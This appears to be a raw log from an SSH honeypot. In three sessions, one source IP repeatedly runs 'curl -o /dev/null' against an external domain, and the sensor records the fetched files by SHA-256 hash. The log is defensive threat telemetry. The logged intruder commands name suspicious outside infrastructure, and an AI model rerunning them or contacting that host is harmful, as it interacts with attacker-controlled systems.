{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.388697Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.393500Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.410403Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.411798Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.414351Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.417986Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.418640Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.420244Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.421886Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.423626Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.424293Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.427643Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.430118Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.433017Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.435066Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.437921Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.463437Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.465121Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.465792Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.468328Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.468895Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.471447Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.472261Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.472857Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.477020Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.478503Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.481629Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.483881Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.485399Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.488353Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.513472Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.514126Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.515740Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.516364Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.520952Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.521704Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.547838Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.549326Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.550718Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.554132Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.556705Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.583808Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.585202Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.586207Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.591097Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.591904Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.593665Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.594689Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.598079Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.602839Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.605432Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.608618Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.611596Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","shasum":"e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.613999Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62 to var/lib/cowrie/downloads/e41656eb2ba6c6293bf6dd928e5a88cdbc50535cab661c1969e0f598e497ed62","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.620016Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.621733Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.650467Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.653903Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.656920Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:28.660800Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:28.664515Z","src_ip":"212.227.125.160","session":"9f264c568782"}
